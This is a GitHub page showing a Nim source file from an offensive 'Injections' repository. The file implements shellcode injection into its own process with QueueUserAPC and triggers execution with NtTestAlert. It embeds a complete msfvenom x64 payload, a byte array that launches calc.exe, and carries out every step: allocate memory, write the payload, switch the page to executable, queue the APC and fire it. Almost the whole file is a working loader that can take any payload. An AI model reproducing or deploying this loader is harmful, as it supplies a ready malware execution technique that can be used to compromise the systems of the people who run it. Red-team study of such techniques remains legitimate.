forked from ahkeur/Injections
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathAPCQueue.nim
More file actions
83 lines (72 loc) · 3.46 KB
/
APCQueue.nim
File metadata and controls
83 lines (72 loc) · 3.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import winim/lean
#[
APC Queue injection in current process and trigger using NtTestAlert.
Source : https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques/blob/master/offensive-security/code-injection-process-injection/shellcode-execution-in-a-local-process-with-queueuserapc-and-nttestalert.md
Steps :
1. Allocate memory in the current process in RW.
2. Write shellcode to the allocated memory.
3. Change memory protection to RX.
4. Queue an APC to the current thread.
5. Trigger the APC using NtTestAlert to execute APC routine.
]#
# msfvenom -p windows/x64/exec CMD=calc.exe -f nim
var sc: array[276, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,
0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,
0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,
0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,
0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,
0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,
0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,
0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,
0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,
0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,
0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,
0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,
0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,
0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,
0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,
0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,
0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,
0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,
0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,
0x00]
type NtTestAlert_t = proc(): NTSTATUS {.stdcall.}
proc main(): void =
var NtTestAlert: NtTestAlert_t = cast[NtTestAlert_t](GetProcAddress(GetModuleHandle("ntdll"), "NtTestAlert"))
if NtTestAlert == nil:
echo "Failed to get NtTestAlert"
echo GetLastError()
quit(1)
echo "NtTestAlert: ", NtTestAlert.repr
var allocatedMemory: LPVOID = VirtualAlloc(nil, sc.len, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)
if allocatedMemory == nil:
echo "Failed to allocate memory"
echo GetLastError()
quit(1)
echo "allocatedMemory: ", allocatedMemory.repr
var bytesWritten: SIZE_T
WriteProcessMemory(GetCurrentProcess(), allocatedMemory, cast[LPVOID](addr sc), sc.len, addr bytesWritten)
if bytesWritten != sc.len:
echo "Failed to write shellcode to allocated memory"
echo GetLastError()
quit(1)
echo "Bytes written: ", bytesWritten
var oldProtect: DWORD
if VirtualProtect(allocatedMemory, sc.len, PAGE_EXECUTE_READ, addr oldProtect) == 0:
echo "Failed to change memory protection"
echo GetLastError()
quit(1)
else:
echo "Memory protection changed to PAGE_EXECUTE_READ"
var apcRoutine: PTHREAD_START_ROUTINE = cast[PTHREAD_START_ROUTINE](allocatedMemory)
QueueUserAPC(cast[PAPCFUNC](apcRoutine), GetCurrentThread(), 0)
echo "APC queued"
discard NtTestAlert()
echo "NtTestAlert triggered, APC should be executed"
when isMainModule:
main()